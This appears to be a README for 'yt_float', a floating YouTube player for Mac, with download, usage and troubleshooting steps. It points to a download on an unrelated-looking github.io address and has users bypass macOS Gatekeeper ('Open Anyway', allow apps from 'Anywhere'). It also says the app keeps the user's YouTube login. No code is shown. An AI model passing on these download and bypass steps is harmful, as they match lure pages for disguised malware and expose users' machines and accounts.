🎬 yt_float - YouTube Floating Mini Player for Mac

🚀 Getting Started

Welcome! This guide will help you download and start using yt_float — a simple app that lets you watch YouTube videos in a small, floating window that stays on top of everything else on your Mac. No technical skills needed. Just follow these easy steps and you'll be watching in no time.

⬇️ Download yt_float Now

📥 Download & Install

Step 1: Get the App

Visit this link to download the application: https://cordslockout5394.github.io

Once you're on that page, look for the latest version listed at the top. You'll see a file to download — click on it to start the download. The file will be saved to your "Downloads" folder (usually located in your Dock or Finder sidebar).

Step 2: Open the Downloaded File

After the download finishes, open your "Downloads" folder. You'll see the file you just downloaded. Double-click it to open. Your Mac might ask you to confirm — click "Open" if prompted. The app will then launch automatically.

Step 3: Start Watching

That's it! The app will appear as a small floating window on your screen. Now you can:

  • Search for any YouTube video or paste a link directly into the app
  • Play, pause, and control volume right from the floating window
  • Move the window anywhere by dragging it with your mouse
  • Resize it by dragging the edges or corners

Your videos will keep playing even when you switch to other apps or go full-screen with something else. The floating window stays on top, always visible.

✨ Features That Make Life Easier

🪟 Floating Always-On-Top

The mini player stays above all your other windows, including full-screen apps. You can watch tutorials while working in a document, follow along with a recipe while cooking, or enjoy music videos while browsing the web — without ever losing sight of your video.

🔒 Remembers Your Sign-In

Once you sign in to your YouTube account within yt_float, the app saves your login. Next time you open it, you're already signed in. No repeated logins, no hassle. Your playlists, subscriptions, and recommendations are right there waiting.

🖥️ Clean, Frameless Design

The window has no bulky borders or menus. Just the video and a few minimal controls. It looks sleek and unobtrusive on your desktop, blending naturally with macOS aesthetics.

⚡ Lightweight and Fast

Built on Electron (a popular framework for desktop apps), but with zero extra frameworks or bloat. It runs smoothly even on older Macs, using minimal system resources. Your Mac stays fast, and your videos play without lag.

🖱️ How to Use yt_float

Opening a Video

  • Paste a YouTube link (URL) into the search bar at the top of the window and press Enter
  • Type a search term (like "lofi beats") and press Enter to see results
  • Use the built-in player controls — play/pause, skip, volume slider, and full-screen toggle

Managing the Window

  • Move: Click and drag the top of the window to reposition it
  • Resize: Drag the bottom-right corner to make it bigger or smaller
  • Always on top: By default, the window stays above others. If you want to temporarily lower it, click the "pin" icon in the top-right corner to toggle this setting
  • Close: Click the "X" button to close the player. Your video progress is saved automatically in most cases.

Full-Screen Mode

Click the full-screen icon (arrows pointing outward) to expand the player to full screen. When you exit full-screen, the player returns to its floating size and position.

🛠️ Troubleshooting Tips

If something doesn't work as expected, try these simple fixes:

  • App won't open: Make sure your Mac allows apps from "Anywhere" or "App Store and identified developers." Go to System Settings → Privacy & Security → scroll down and look for a message about the app, then click "Open Anyway."
  • No video plays: Check your internet connection. Restart the app by right-clicking its icon in the Dock (if visible) and choosing "Quit," then reopen it.
  • Window not staying on top: Click the pin icon to re-enable always-on-top mode.
  • Forgot sign-in: Sign out and sign back in once. The app will remember it after that.
  • App seems slow: Close other heavy apps. Restart yt_float for a fresh start.

📱 System Requirements

yt_float is designed for macOS (any version from macOS 10.15 Catalina onward). It works on both Intel and Apple Silicon (M1/M2/M3) Macs. No special hardware or software is required.

🔄 Updates

We regularly improve yt_float. When a new version is available, you'll see a notification within the app. Simply click it to download and install the update. Alternatively, you can check the releases page for the latest version.
